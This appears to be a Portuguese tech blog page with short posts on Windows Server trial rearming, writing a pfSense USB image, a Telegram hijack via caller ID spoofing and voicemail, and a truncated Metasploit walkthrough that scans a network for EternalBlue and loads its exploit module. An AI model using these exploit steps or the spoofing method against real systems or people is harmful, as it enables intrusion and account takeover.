Postagens

Evaluation Period expired for Windows Server

Imagem
 Dica simples para aqueles que estão testando o período de teste do Windows Server (dentro dos 180 dias), mais caso tenha expirado. Verificando a data de expiração slmgr /dli   Revalidando para mais dias slmgr /rearm   Efetue o reboot na maquina e configura novamente com o comando slmgr /dli   Com isso fechamos mais um POST que ajudam no dia a dia.

Criando um pendrive pfSense no Linux

Imagem
Olá vamos aprender hoje como gravar um arquivo .img dentro de um pendrive no Linux Para nosso laboratorio vamos fazer um download de uma imagem do Firewall pfSense Fazendo download da imagem https://www.pfsense.org/download/ Descompactanto o arquivo .gz após download $ gzip -d pfSense-CE-memstick-serial-2.4.5-RELEASE-p1-amd64.img.gz Conecte o dispositivo em seu Desktop/Notebook $ sudo dmesg Nota: este comando vai trazer qual é o dispositivo que será conectado no seu Desktop/Notebook Zerando o pendrive destino $ sudo dd if=/dev/zero of=/dev/sdz bs=1M count=1 Gravando arquivo no pendrive destino $ sudo dd if=<image_file_name> of=<usb_disk_device_name> Exemplo $ sudo dd if=file1.img of=/dev/sdb bs=4M Com esse tutorial entendemos criar um pendrive para utilizar em nossas instalações pfSense (via serial)

Celular hackeado (Telegram)

PREMISSA: TODO CONTEUDO ABAIXO SERVE APENAS PARA FINS ACADÊMICOS E ENTENDIMENTO DO QUE ACONTECEU COM O "CLONE" DA LINHA. Celular hackeado (Telegram) SIM Swap Operação Spoofing Objetivo Acessar as contas de Telegram das vitimas Procedimento de login 1. numero de telefone que envia um SMS vai acessar o login 2. caso falhe receber uma ligação Acessar as caixas postais das vitimas Ligar para seu próprio numero Caller ID Spoofing ** esse e o cara!!! Camuflagem do remetente --> Manipulação de uma informação dentro da telefonia Caller ID (identificativo de quem esta ligando) Software VOIP Deixar o telefone ocupado DEIXAR CLARO QUE: 1. Falha foi das operadoras (sem senhas) acesso a caixa postal; 2. Telegram das vitimas (não acessou os dados do celular); O que fazer para me proteger? Ativar a autenticação de dois fatores

Varredura na Rede (para detectar o eternalblue)

Olá para darmos continuidade ao ano de 2020, hoje vou demostrar a varredura em sua Rede para detectar o eternalblue. A premissa que vou considerar que você já tem em seu virtualbox é um kali linux atualizado https://www.kali.org/downloads/ Comandos dentro do Kali Linux # service postgresql start # msfconsole msf5 > search smb_ms17_010 msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > show options msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24 msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 100 msf5 auxiliary(scanner/smb/smb_ms17_010) > run Quando a vulnerabilidade for identificada teremos a saida "Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86" msf5 auxiliary(scanner/smb/smb_ms17_010) > back msf5 > search ms17_010_eternalblue msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternal...